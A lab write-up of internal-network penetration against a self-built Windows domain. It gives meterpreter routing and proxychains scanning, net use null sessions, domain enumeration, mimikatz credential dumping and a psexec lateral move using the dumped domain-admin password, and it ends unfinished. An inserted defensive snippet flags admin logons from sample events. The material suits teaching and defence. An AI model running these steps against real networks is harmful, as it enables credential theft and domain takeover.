1. Environment
The domain environment is self-built, basically imitating enterprise deployment
Domain: learn.com

| OS | IP address | Local account/password | Domain account/password | Role |
| --- | --- | --- | --- | --- |
| Windows 2008 R2 | 192.168.138.129 | Administrator/[email protected] | learn\Administrator/[email protected] | DC (domain controller) |
| Windows 2003 | NIC 1: 192.168.138.130, NIC 2: 192.168.47.159 | Administrator/root | learn\win2003/win@2003 | domain host / external web server |
| Windows XP | 192.168.138.131 | Administrator/root | learn\winxp/[email protected] | domain host |
2. Penetration steps
PS: Since this is an internal network test, the earlier steps of getting from the external network into the internal network are omitted. That is, we assume the attacker has already taken control of the Windows 2003 host.
2.1 Information collection
2.1.1 IP-domain information
Information gathered
Account: learn\win2003
Domain: learn.com
Internal IP: 192.168.138.130
External IP: 192.168.47.159
Domain controller (DC) IP: 192.168.138.129
Another host in the domain: 192.168.138.131
C:\Documents and Settings\win2003\����>ping learn.com
Pinging learn.com [192.168.138.129] with 32 bytes of data:
Reply from 192.168.138.129: bytes=32 time<1ms TTL=128
Internal host discovery:
1. In the meterpreter shell, run: for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.138.%I | findstr "TTL="
2. Set up a route/proxy and scan the internal network (see section 2.1.2)
2.1.2 Establish routing-proxy
run autoroute -s 192.168.138.0/24 #add a route to the internal subnet through the current session
run autoroute -p #print the routing table
Method 1: Scanning module that comes with msf
Host discovery (try these yourself and see what they return!):
use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/netbios/nbname
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/udp_sweep
Port scanning:
use auxiliary/scanner/portscan/ack
Service scanning: pick whichever modules you need!
search auxiliary/scanner/
Method 2: Set up proxychains
use auxiliary/server/socks4a
set SRVPORT 3333
run
vi /etc/proxychains.conf
socks4 192.168.47.147 3333
sudo proxychains3 nmap -Pn -sS 192.168.138.0/24 (inside the domain a bare scan may not identify hosts; consider adding some common ports to the scan, as below)
sudo proxychains3 nmap -Pn -sS 192.168.138.129 -p 3389,445
2.1.3 Domain user information collection
Common instructions
ipconfig /all show the local IP and the domain the host belongs to
route print print the routing table
net view list other host names on the LAN
arp -a show the ARP cache
net start list running services
net share list active shares
net share ipc$ enable the IPC$ share
net share c$ enable the C$ share
net use \\192.168.xx.xx\ipc$ "" /user:"" establish a null session with 192.168.xx.xx
net use \\192.168.xx.xx\c$ "password" /user:"username" connect to the C$ share
dir \\192.168.xx.xx\c$\user list files in the user directory on the C: drive of 192.168.xx.xx
net config Workstation show computer name, full name, user name, system version, workstation, domain and logon domain
net user list local users
net user /domain list domain users
net localgroup administrators list the local administrators group (often contains domain users)
net view /domain show how many domains there are
net user username /domain get information about a specific domain user
net group /domain list the groups in the domain and see how users are divided into groups (can only be run on the domain controller)
net group groupname /domain inspect a specific group in the domain
net group "domain admins" /domain list the domain administrators
net group "domain computers" /domain list the other host names in the domain
MSF module
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ad_groups
run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domain_users
run post/windows/gather/enum_domains
Information gathered
Domain: learn.com
Domain users: Administrator Guest krbtgt win2003 winxp
Use the built-in mimikatz of msf to extract account passwords
load mimikatz #load the mimikatz module
help #list the available commands
Mimikatz Commands
=================
Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds. #extract domain account passwords
livessp Attempt to retrieve livessp creds.
mimikatz_command Run a custom command.
msv Attempt to retrieve msv creds (hashes).
ssp Attempt to retrieve ssp creds.
tspkg Attempt to retrieve tspkg creds.
wdigest Attempt to retrieve wdigest creds. #extract account passwords held in memory
meterpreter >
Thinking: once inside the intranet, what we want most is domain administrator privileges. We can either forge tickets for a PTT attack, or obtain plaintext passwords directly!!!
(Prerequisite: the hosts in the domain have no system-level or common service vulnerabilities.)
2.2 Lateral movement of the intranet
2.2.1 Dump clear-text passwords from memory
To make it easy to obtain the password from memory, the domain administrator account was used to log on to the win2003 extranet server.
**In this way, the domain administrator's account and password are obtained:** Administrator/[email protected]
From here, you can basically walk across the whole intranet!!!
For example, we already know from earlier that another host exists on the internal network: 192.168.138.131
A quick demonstration:
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp #note: inside an internal network the network is often restricted, so a bind-type payload is normally used
set rhost 192.168.138.131
set rhosts 192.168.138.131
set smbdomain learn.com
set smbuser Administrator
set smbpass [email protected]
set lport 5556
exploit
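From the defender's side, both the domain admin's RDP logon to the win2003 server and the psexec logon to the XP host show up as Windows Security event 4624 on the target machine. The following Python snippet is an added example (not from the article) that runs over constructed sample events modelled on this lab and flags privileged accounts logging onto anything that is not a domain controller, which is exactly the habit that made the plaintext dump possible. The hostnames DC01, WIN2003 and WINXP and the RDP source address are assumed placeholders.

```python
"""Flag Domain Admin logons to hosts outside the DC tier (constructed sample data)."""

# Assumed placeholders for the lab in this article.
PRIVILEGED = {"learn\\administrator"}      # accounts that should only touch DCs
DOMAIN_CONTROLLERS = {"DC01"}              # hostname placeholder for 192.168.138.129

# Constructed event 4624 records (fields as they appear in the Security log).
SAMPLE_EVENTS = [
    # Legitimate: domain admin working interactively on the DC itself.
    {"EventID": 4624, "Computer": "DC01", "TargetDomainName": "learn",
     "TargetUserName": "Administrator", "LogonType": 2, "IpAddress": "-"},
    # The mistake the article relies on: domain admin RDPs (type 10) to the win2003 server.
    {"EventID": 4624, "Computer": "WIN2003", "TargetDomainName": "learn",
     "TargetUserName": "Administrator", "LogonType": 10, "IpAddress": "192.168.47.1"},
    # The psexec step: network logon (type 3) to the XP host from the compromised server.
    {"EventID": 4624, "Computer": "WINXP", "TargetDomainName": "learn",
     "TargetUserName": "Administrator", "LogonType": 3, "IpAddress": "192.168.138.130"},
    # Ordinary domain user logging on over the network; must not alert.
    {"EventID": 4624, "Computer": "WINXP", "TargetDomainName": "learn",
     "TargetUserName": "winxp", "LogonType": 3, "IpAddress": "192.168.138.131"},
]


def flag_privileged_logons(events, privileged=PRIVILEGED, dcs=DOMAIN_CONTROLLERS):
    """Return one alert per privileged-account logon on a non-DC host.

    Interactive and RemoteInteractive logons (types 2 and 10) typically leave
    reusable credentials in LSASS, which is what the wdigest dump above harvested;
    a plain network logon (type 3) usually does not, but still marks lateral
    movement with the privileged account, so both are reported.
    """
    alerts = []
    for e in events:
        if e.get("EventID") != 4624:
            continue
        account = f'{e["TargetDomainName"]}\\{e["TargetUserName"]}'.lower()
        if account not in privileged or e["Computer"] in dcs:
            continue
        alerts.append({
            "host": e["Computer"],
            "account": account,
            "logon_type": e["LogonType"],
            "source": e["IpAddress"],
            "credentials_left_in_lsass": e["LogonType"] in (2, 10),
        })
    return alerts


if __name__ == "__main__":
    for a in flag_privileged_logons(SAMPLE_EVENTS):
        print(a)
```

In this lab the first alert (WIN2003, type 10) is the one a Domain Admins tiering rule should have prevented; the second (WINXP, type 3 from 192.168.138.130) is the psexec hop itself.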
3. Summary
But: in practice we cannot get the plaintext password! In large and medium-sized enterprises, hosts older than Windows 2008 are basically no longer in use.
Next, we need to use PTH and PTT attacks.
Tired of writing, let's do this for now!
We will continue to add the PTH PTT attack part later, look forward to it! ! !
PTH and PTT attacks